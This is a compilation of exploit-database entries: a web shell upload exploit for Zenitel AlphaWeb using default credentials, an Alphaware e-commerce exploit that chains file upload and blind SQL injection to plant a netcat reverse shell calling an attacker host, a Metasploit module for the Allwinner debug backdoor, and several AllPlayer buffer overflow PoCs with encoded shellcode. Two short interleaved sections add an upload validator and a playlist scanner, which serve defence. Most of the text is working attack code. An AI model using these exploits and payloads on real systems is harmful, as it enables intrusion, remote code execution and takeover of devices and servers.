# Vendor website: https://www.zenitel.com/
# Product website: https://wiki.zenitel.com/wiki/AlphaWeb
# Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami"
# Reference: https://github.com/ricardojoserf/CVE-2021-40845

import requests
import base64
import argparse

# Default credentials, change them if it is necessary
admin_user = "admin"
admin_pass = "alphaadmin"
scripter_user = "scripter"
scripter_pass = "alphascript"


def get_args():
	parser = argparse.ArgumentParser()
	parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
	parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
	my_args = parser.parse_args()
	return my_args


def main():
	args = get_args()
	base_url = args.url
	url_main =   base_url + "/php/index.php"
	url_upload = base_url + "/php/script_uploads.php"

	command = args.command
	uploaded_file = "poc.php"
	url_cmd = base_url + "/cmd/" + uploaded_file + "?cmd=" + command

	login_authorization =  "Basic " + str(base64.b64encode((admin_user+':'+admin_pass).encode('ascii')).decode('ascii'))
	upload_authorization = "Basic " + str(base64.b64encode((scripter_user+":"+scripter_pass).encode('ascii')).decode('ascii'))

	headers_login = {
		"Authorization": login_authorization,
		"Cache-Control": "max-age=0"
	}

	headers_upload = {
		'Authorization': upload_authorization,
		'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="92"',
		'sec-ch-ua-mobile': '?0',
		'Upgrade-Insecure-Requests': '1',
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
		'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
		'Sec-Fetch-Site': 'same-origin',
		'Sec-Fetch-Mode': 'navigate',
		'Sec-Fetch-User': '?1',
		'Sec-Fetch-Dest': 'iframe',
		'Accept-Encoding': 'gzip, deflate',
		'Accept-Language': 'en-US,en;q=0.9',
	}

	files = {
		"userfile":(uploaded_file, "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"),
	}

	s = requests.session()
	# Login as admin
	s.get(url_main, headers = headers_login)
	# Upload file
	upload = s.post(url_upload, files=files, headers = headers_upload)
	# Execute command
	cmd = s.post(url_cmd)
	print(cmd.text.replace("<pre>","").replace("</pre>",""))


if __name__ == "__main__":
    main()
            
# Exploit Title: Alphaware E-Commerce System 1.0 - Unauthenticated Remote Code Execution (File Upload + SQL injection)
# Date: 15-03-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html
# Software Download: https://www.sourcecodester.com/download-code?nid=11676&title=Alphaware+-+Simple+E-Commerce+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86

# --- Description --- #

# The web application allows an unauthenticated file upload, which can result in remote code execution.
# We combine this issue with an SQL injection to retrieve the randomised name of our uploaded PHP shell.

# --- Proof of concept --- #

#!/usr/bin/python3
import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

def file_upload(target_ip, attacker_ip, attacker_port):
  random_number = str(random.randint(100000000,999999999))
  file_name = "SHELL.php"
  revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
  m = MultipartEncoder(fields={'add': '', 'product_image': (file_name, revshell_string, 'application/x-php'),'product_code':random_number,'product_name':'R3v_5H3LL','product_price':'123','product_size':'99','brand':'N0_name','category':'Hackers','qty':'1'})
  print("(+) Uploading php reverse shell file ..")
  r1 = requests.post('http://{}/alphaware/admin/admin_football.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
  return random_number

def trigger_shell_sqli(target_ip,product_id):
  target_file_name = ''
  url = 'http://{}/alphaware/function/admin_login.php'.format(target_ip)
  print("(+) Now setting up our sqli for file name guessing ..")

  # STEP 1: Get length of target column in database ..
  for i in range(1, 200):
    payload = {'enter':'','username':"' or {}=(select char_length(product_image) from product where product_id = {})#".format(i, product_id)}
    r2 = requests.post(url, data=payload, allow_redirects=False)

    # STEP 2: successful sqli will be indicated by a redirect.. setting up our blind based file name guessing. :-)
    if str(r2.status_code) == '302':
      print("(+) Initial sqli successful, got length of our target file name!")
      print("(+) Now for the filename.. ", end = '')
      for j in range(1, i+1):
        for brutechar in range(32, 126):
          payload = {'enter':'','username':"' or '{}'=(SELECT substring((SELECT product_image from product where product_id = {}),{},1))#".format(chr(brutechar),product_id,j)}
          r3 = requests.post(url, data=payload, allow_redirects=False)
          if str(r3.status_code) == '302':
            target_file_name = target_file_name + chr(brutechar)
            print(chr(brutechar), end = '')
            sys.stdout.flush()
            break

  url = 'http://{}/alphaware/photo/{}.php'.format(target_ip,target_file_name.split('.')[0])
  print("\r\n(+) Trying to trigger shell by requesting {} ..".format(url))
  r4 = requests.get(url)

def main():
  if len(sys.argv) != 4:
    print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
    print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
    sys.exit(-1)

  target_ip = sys.argv[1]
  attacker_ip = sys.argv[2]
  attacker_port = sys.argv[3]

  product_id = file_upload(target_ip, attacker_ip, attacker_port)
  trigger_shell_sqli(target_ip, product_id)

  print("(+) done!")

if __name__ == "__main__":
  main()
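The AlphaWeb and Alphaware entries above share one root cause: an upload endpoint accepts a file named `.php`, stores it where the web server executes scripts, and the only obstacle (in Alphaware's case a randomised file name) is recovered through a second bug. The following is an added example, not code from either exploit or from either vendor, showing the validation an image upload handler should perform: exactly one extension from an allowlist, magic bytes that match that extension, no script markers anywhere in the body, and a server-chosen random storage name whose extension comes from the verified content type rather than from the client. The signature table, size limit and marker list are constructed for the example.

```python
import os
import secrets

# Magic-byte prefixes for the image types the form accepts (constructed allowlist).
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Markers that must not appear anywhere in an "image", even after a valid header.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


class UploadRejected(ValueError):
    """Raised with a reason the server can log; the client should get a generic error."""


def validate_image_upload(filename, content, max_bytes=5 * 1024 * 1024):
    """Check an uploaded image and return the server-chosen storage name.

    The storage name is random and its extension is derived from the verified
    content type, never from the client-supplied filename."""
    if not content:
        raise UploadRejected("empty file")
    if len(content) > max_bytes:
        raise UploadRejected("file too large")
    # Only the last path component matters; strip directories written with either separator.
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or "\x00" in name or name.startswith("."):
        raise UploadRejected("bad filename")
    parts = name.lower().split(".")
    if len(parts) != 2:
        # 'shell.php.png' and 'shell' both fail here: exactly one extension is allowed.
        raise UploadRejected("filename must have exactly one extension")
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    if ext not in IMAGE_SIGNATURES:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not content.startswith(IMAGE_SIGNATURES[ext]):
        raise UploadRejected("content does not match declared image type")
    lowered = content.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        # A valid image header followed by PHP is still a script to a server that
        # executes by extension or by content sniffing.
        raise UploadRejected("script markers found inside image")
    return f"{secrets.token_hex(16)}.{ext}"


def upload_is_rejected(filename, content):
    """True when the handler refuses the upload; handy for checks and tests."""
    try:
        validate_image_upload(filename, content)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a minimal PNG header and the kind of file the exploits above upload.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    for fname, body in [("photo.png", png), ("poc.php", b"<?php system($_REQUEST['cmd']); ?>"),
                        ("shell.php.png", png), ("shell.png", png + b"<?php echo 1; ?>")]:
        try:
            print(f"{fname}: stored as {validate_image_upload(fname, body)}")
        except UploadRejected as why:
            print(f"{fname}: rejected ({why})")
```

The random storage name alone is not a control, as the Alphaware exploit's blind SQL injection against the product table shows: once the name leaks, a `.php` file in a script-enabled directory runs. The handler above keeps the name random but also guarantees the stored file can only ever carry an image extension; store it under a directory where the web server has script execution disabled and serve it with a fixed Content-Type to close the remaining paths.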
            
source: https://www.securityfocus.com/bid/62036/info

Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/62036.zip
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
        "Name"           => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
        "Description"    => %q{
          This module attempts to exploit a debug backdoor privilege escalation in
          Allwinner SoC based devices.
          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
          Vulnerable OS: all OS images available for Orange Pis,
                         any for FriendlyARM's NanoPi M1,
                         SinoVoip's M2+ and M3,
                         Cuebietech's Cubietruck +
                         Linksprite's pcDuino8 Uno
          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
        },
        "License"        => MSF_LICENSE,
        "Author"         =>
          [
            "h00die <mike@stcyrsecurity.com>",  # Module
            "KotCzarny"                         # Discovery
          ],
        "Platform"       => [ "android", "linux" ],
        "DisclosureDate" => "Apr 30 2016",
        "DefaultOptions" => {
          "payload" => "linux/armle/mettle/reverse_tcp"
        },
        "Privileged"     => true,
        "Arch"           => ARCH_ARMLE,
        "References"     =>
          [
            [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
            [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \
                     "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
            [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
          ],
        "SessionTypes"   => [ "shell", "meterpreter" ],
        'Targets'        =>
          [
            [ 'Auto',           { } ]
          ],
        'DefaultTarget'  => 0,
      ))
  end

  def check
    backdoor = '/proc/sunxi_debug/sunxi_debug'
    if file_exist?(backdoor)
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    backdoor = '/proc/sunxi_debug/sunxi_debug'
    if file_exist?(backdoor)
      pl = generate_payload_exe

      exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
      vprint_good "Backdoor Found, writing payload to #{exe_file}"
      write_file(exe_file, pl)
      cmd_exec("chmod +x #{exe_file}")

      vprint_good 'Escalating'
      cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
    else
      print_error "Backdoor #{backdoor} not found."
    end
  end
end
            
#!/usr/bin/python
# Tested on: Windows 10 Professional (x86)
# Exploit for previous version: https://www.exploit-db.com/exploits/42455/ (Seems they haven't patched the vulnerability at all :D)

# msfvenom -p windows/exec CMD="calc.exe" -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode =  ""
shellcode += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode += "\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x5a\x48\x33\x52"
shellcode += "\x69\x70\x69\x70\x6d\x30\x31\x50\x53\x59\x79\x55\x30"
shellcode += "\x31\x75\x70\x6f\x74\x72\x6b\x42\x30\x6e\x50\x52\x6b"
shellcode += "\x4e\x72\x7a\x6c\x52\x6b\x4e\x72\x6a\x74\x44\x4b\x71"
shellcode += "\x62\x6c\x68\x7a\x6f\x34\x77\x50\x4a\x6f\x36\x30\x31"
shellcode += "\x4b\x4f\x74\x6c\x6d\x6c\x43\x31\x63\x4c\x7a\x62\x6e"
shellcode += "\x4c\x4d\x50\x47\x51\x66\x6f\x6c\x4d\x79\x71\x55\x77"
shellcode += "\x68\x62\x6a\x52\x31\x42\x31\x47\x42\x6b\x6e\x72\x6c"
shellcode += "\x50\x64\x4b\x30\x4a\x4d\x6c\x62\x6b\x6e\x6c\x4c\x51"
shellcode += "\x63\x48\x5a\x43\x6f\x58\x4b\x51\x48\x51\x72\x31\x62"
shellcode += "\x6b\x71\x49\x4d\x50\x59\x71\x46\x73\x72\x6b\x6e\x69"
shellcode += "\x7a\x78\x48\x63\x6c\x7a\x61\x39\x44\x4b\x6c\x74\x64"
shellcode += "\x4b\x4b\x51\x37\x66\x70\x31\x69\x6f\x54\x6c\x39\x31"
shellcode += "\x46\x6f\x5a\x6d\x79\x71\x58\x47\x4f\x48\x69\x50\x53"
shellcode += "\x45\x6c\x36\x6d\x33\x43\x4d\x49\x68\x6d\x6b\x61\x6d"
shellcode += "\x6c\x64\x51\x65\x58\x64\x72\x38\x72\x6b\x4f\x68\x4e"
shellcode += "\x44\x39\x71\x46\x73\x4f\x76\x52\x6b\x4c\x4c\x30\x4b"
shellcode += "\x34\x4b\x70\x58\x6d\x4c\x4d\x31\x58\x53\x64\x4b\x49"
shellcode += "\x74\x64\x4b\x6b\x51\x38\x50\x75\x39\x6e\x64\x4b\x74"
shellcode += "\x6e\x44\x31\x4b\x51\x4b\x6f\x71\x62\x39\x4f\x6a\x70"
shellcode += "\x51\x49\x6f\x47\x70\x31\x4f\x51\x4f\x31\x4a\x54\x4b"
shellcode += "\x6d\x42\x38\x6b\x34\x4d\x61\x4d\x30\x6a\x79\x71\x54"
shellcode += "\x4d\x74\x45\x77\x42\x79\x70\x4d\x30\x69\x70\x30\x50"
shellcode += "\x51\x58\x70\x31\x72\x6b\x42\x4f\x42\x67\x6b\x4f\x57"
shellcode += "\x65\x35\x6b\x68\x70\x47\x45\x34\x62\x4f\x66\x62\x48"
shellcode += "\x73\x76\x44\x55\x77\x4d\x43\x6d\x79\x6f\x6a\x35\x6d"
shellcode += "\x6c\x7a\x66\x31\x6c\x69\x7a\x73\x50\x4b\x4b\x4b\x30"
shellcode += "\x31\x65\x4a\x65\x57\x4b\x6d\x77\x4c\x53\x64\x32\x50"
shellcode += "\x6f\x71\x5a\x4b\x50\x51\x43\x6b\x4f\x49\x45\x50\x63"
shellcode += "\x31\x51\x50\x6c\x72\x43\x6e\x4e\x71\x55\x74\x38\x31"
shellcode += "\x55\x6b\x50\x41\x41"

buffer  = "http://"
buffer += "\x41" * 301
buffer += "\x61\x41"            # POPAD (NSEH)
buffer += "\x0f\x47"            # P/P/R (SEH)
buffer += "\x56\x41"            # PUSH ESI
buffer += "\x58\x41"            # POP EAX
buffer += "\x05\x07\x01\x41"    # ADD EAX, 0x1000700
buffer += "\x2d\x04\x01\x41"    # SUB EAX, 0x1000400
buffer += "\x50\x41"            # PUSH EAX
buffer += "\xc3"                # RET
buffer += "\x41" * 45
buffer += shellcode
buffer += "\x41" * (1500 - len(buffer))

f=open("player.m3u",'wb')
f.write(buffer)
f.close()
            
#!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
# Date: 07-04-2019
# Vulnerable Software: AllPlayer V7.4
# Vendor Homepage: https://www.allplayer.org/
# Version: 7.4
# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe
# Tested on: Windows 7 SP1 x86
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open AllPlayer
# 3. select "Open video or audio file", click "Open URL"
# 4. paste contents from clipboard
# 5. select OK
# 6. calc.exe
#

filename="evil.txt"
header = "http://"
junk = "\xcc" * 301
nseh = "\x90\x45"
seh = "\x7a\x74" #pop pop retn
valign = (
"\x55" #push ebp
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x18\x11" #sub eax,11001900
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\xcc" * 115
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
            
#!/usr/bin/python
# Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode)
# Version: 7.4
# Date: 15-08-2017
# Exploit Author: f3ci
# Tested on: Windows 7 SP1 x86

head = "http://"
seh = "\x0f\x47" #0x0047000f
nseh = "\x61\x41" #popad align
junk = "\x41" * 301
junk2 = "\x41" * 45

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
#x86/unicode_mixed succeeded with size 782 (iteration=0)
#Payload size: 782 bytes
buf = ""
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"

#venetian
ven = "\x56"            #push esi
ven += "\x41"           #align
ven += "\x58"           #pop eax
ven += "\x41"           #align
ven += "\x05\x04\x01"   #add eax,01000400
ven += "\x41"           #align
ven += "\x2d\x01\x01"   #add eax,01000100
ven += "\x41"           #align
ven += "\x50"           #push eax
ven += "\x41"           #align
ven += "\xc3"           #ret

buffer = head + junk + nseh + seh + ven + junk2 + buf

print len(buffer)
f=open("C:\Users\Lab\Desktop\player.m3u",'wb')
f.write(buffer)
f.close()
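The three AllPlayer PoCs above all follow the same shape: a playlist whose single "http://" entry is padded past 301 bytes, widened to UTF-16 by the player and copied into a fixed stack buffer until it overwrites the SEH record. The scanner below is an added example written from the defender's side; it is not code from any of the PoC authors. It parses an .m3u playlist and flags entries that are oversized, contain bytes no URL needs, or carry the long single-byte filler run every PoC on this page uses. The 512-byte limit, the URL character set and the two playlists are assumptions constructed for the example, not values taken from the PoCs.

```python
"""Triage scanner for .m3u playlists (added example; thresholds are assumptions)."""
import re
import string

# Assumed sane upper bound for one playlist entry; real players accept far more,
# which is exactly why an entry near the PoC sizes (~1500 bytes) deserves a look.
MAX_ENTRY_LEN = 512

# Bytes a URL or local path legitimately uses (assumption: RFC 3986 set plus space/backslash).
URL_SAFE = frozenset(string.ascii_letters + string.digits + "-._~:/?#[]@!$&'()*+,;=% \\")


def widened_len(entry):
    """Size of the entry after the UTF-16 widening the vulnerable copy performs."""
    return 2 * len(entry)


def scan_entry(entry):
    """Return a list of findings for one playlist entry (bytes); empty means clean."""
    findings = []
    if len(entry) > MAX_ENTRY_LEN:
        findings.append("oversized entry: %d bytes (%d after UTF-16 widening)"
                        % (len(entry), widened_len(entry)))
    bad = sorted({b for b in entry if chr(b) not in URL_SAFE})
    if bad:
        findings.append("non-URL bytes present: "
                        + ", ".join("0x%02x" % b for b in bad[:8]))
    # A run of 100+ identical bytes is the "A" * 301 style filler, not a URL.
    m = re.search(rb"(.)\1{99,}", entry, re.DOTALL)
    if m:
        findings.append("filler run of 0x%02x x %d" % (m.group(1)[0], len(m.group(0))))
    return findings


def scan_m3u(data):
    """Scan a whole playlist; returns {line_number: [findings]} for suspicious entries."""
    report = {}
    for n, line in enumerate(data.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith(b"#"):   # blank lines and #EXT tags carry no entry
            continue
        found = scan_entry(line)
        if found:
            report[n] = found
    return report


# Constructed samples: a benign playlist and one shaped like the PoCs above
# (prefix, 301-byte filler, 2-byte nSEH/SEH slots, venetian stub, shellcode, tail).
BENIGN = b"#EXTM3U\n#EXTINF:-1,Song\nhttp://example.invalid/music/song.mp3\n"
CRAFTED = (b"http://" + b"A" * 301 + b"\x61\x41\x0f\x47" + b"\x41" * 45
           + b"PPYAIAIA" + b"\x41" * 1000 + b"\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(name, scan_m3u(sample))
```

Run it on a real playlist with `scan_m3u(open(path, "rb").read())`; an empty dict means nothing tripped the heuristics. The widened length is reported because it is the number the vulnerable copy actually writes, so a 301-byte entry is already a 602-byte write into the player's buffer.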
            
source: https://www.securityfocus.com/bid/67436/info

ALLPlayer is prone to a memory-corruption vulnerability.

An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.

ALLPlayer 5.9 is vulnerable; other versions may also be affected. 

data
="\x52\x49\x46\x46\xE4\x0D\x0A\x09\x00\x57\x41\x56\x45\x66\x6D\x74\x20\x10\x00\x00\x00\x01\x00\x02\x00\x44\xAC\x00\x00\x10\xB1\x02\x00\x04\x00\x10\x00\x64\x61\x74\x61\xC0\x0D\x0A\x09\x00\x01\x00\x01\x00\x00\x00\x01\x00\x01\x00\x04\x00\x00\x00\x05\x00\x02\x00\x08\x00\x02\x00\x09\x00\x01\x00\x0D\x0A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x
41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x